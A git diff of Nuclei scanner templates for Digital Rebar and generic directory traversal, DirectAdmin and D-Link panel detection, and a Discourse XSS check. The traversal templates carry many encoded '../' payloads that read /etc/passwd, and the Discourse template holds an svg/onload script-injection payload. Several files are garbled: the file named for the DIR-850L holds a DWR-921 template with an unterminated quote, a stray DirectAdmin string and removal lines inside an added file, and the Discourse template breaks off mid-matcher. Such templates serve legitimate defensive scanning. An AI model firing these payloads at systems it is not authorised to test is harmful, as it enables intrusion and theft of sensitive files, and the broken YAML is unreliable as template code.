diff --git a/nuclei-templates/Other/digitalrebar-traversal-6996.yaml b/nuclei-templates/Other/digitalrebar-traversal-6996.yaml
deleted file mode 100644
index 1f2c6fba5c..0000000000
--- a/nuclei-templates/Other/digitalrebar-traversal-6996.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: digitalrebar-traversal
-
-info:
- name: Digital Rebar - Local File Inclusion
- author: c-sh0
- severity: high
- description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
- reference:
- - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
- - https://docs.rackn.io/en/latest/doc/release.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- metadata:
- max-request: 1
- tags: lfi,rackn,digitalrebar
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- part: body
- regex:
- - "root:.*:0:0"
-
- - type: word
- part: header
- words:
- - 'X-Drp-Sha256sum:'
-
- - type: status
- status:
- - 200
-
-# digest: 490a0046304402202b2251aa0982617ab7d1ac89b161f29697ff138ca764a8222fac030d56dede930220172a9ce328e8b0fa85197baf3f9b8da998acb35d1c9b6ec2bd2919c5008ace01:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/Other/digitalrebar-traversal.yaml b/nuclei-templates/Other/digitalrebar-traversal.yaml
new file mode 100644
index 0000000000..bea4fda05a
--- /dev/null
+++ b/nuclei-templates/Other/digitalrebar-traversal.yaml
@@ -0,0 +1,33 @@
+id: digitalrebar-traversal
+info:
+ name: Digital Rebar - Local File Inclusion
+ author: c-sh0
+ severity: high
+ description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
+ reference:
+ - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
+ - https://docs.rackn.io/en/latest/doc/release.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: lfi,rackn,digitalrebar
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0"
+ - type: word
+ part: header
+ words:
+ - 'X-Drp-Sha256sum:'
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/nuclei-templates/Other/dir-850l-login-panel.yaml b/nuclei-templates/Other/dir-850l-login-panel.yaml
new file mode 100644
index 0000000000..a2b63d11bb
--- /dev/null
+++ b/nuclei-templates/Other/dir-850l-login-panel.yaml
@@ -0,0 +1,25 @@
+id: dwr-921-login-panel
+
+info:
+ name: D-Link DWR-921 Login Panel
+ author: daffainfo
+ severity: info
+ tags: dlink,router,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'D-Link DWR-921'
+ - 'DirectAdmin Login"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/directadmin-login-panel.yaml b/nuclei-templates/Other/directadmin-login-panel.yaml
new file mode 100644
index 0000000000..5336fb2eea
--- /dev/null
+++ b/nuclei-templates/Other/directadmin-login-panel.yaml
@@ -0,0 +1,22 @@
+id: directadmin-login-panel
+info:
+ name: DirectAdmin Login Panel Detect
+ author: idealphase
+ severity: info
+ description: A modern control panel's primary purpose is to effectively facilitate the routine management of your hosting infrastructure and present these tasks simply and intuitively to both the user and to you as the administrator.
+ reference: https://www.directadmin.com/whats_new.php
+ metadata:
+ shodan-query: title:"DirectAdmin Login"
+ tags: panel,directadmin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
DirectAdmin Login"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/directory-traversal-7002.yaml b/nuclei-templates/Other/directory-traversal-7002.yaml
new file mode 100644
index 0000000000..1716093659
--- /dev/null
+++ b/nuclei-templates/Other/directory-traversal-7002.yaml
@@ -0,0 +1,43 @@
+id: directory-traversal
+
+info:
+ name: Generic Directory Traversal
+ author: pentest_swissky
+ severity: high
+ description: Detect basic directory traversal leading to a leak of sensitive files.
+ tags: lfi,fuzz
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+ - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+ - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+ - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+ - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
diff --git a/nuclei-templates/Other/directory-traversal.yaml b/nuclei-templates/Other/directory-traversal.yaml
deleted file mode 100644
index 595ff9cfa6..0000000000
--- a/nuclei-templates/Other/directory-traversal.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: directory-traversal
-info:
- name: Generic Directory Traversal
- author: pentest_swissky
- severity: high
- description: Detect basic directory traversal leading to a leak of sensitive files.
- tags: lfi,fuzz
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
- - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- part: body
diff --git a/nuclei-templates/Other/discourse-xss-7014.yaml b/nuclei-templates/Other/discourse-xss-7014.yaml
deleted file mode 100644
index 1ba1c7ef63..0000000000
--- a/nuclei-templates/Other/discourse-xss-7014.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: discourse-xss
-
-info:
- name: Discourse CMS - XSS
- author: madrobot
- severity: medium
- description: Cross-site scripting (XSS) on Discourse CMS
- tags: xss,discourse
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "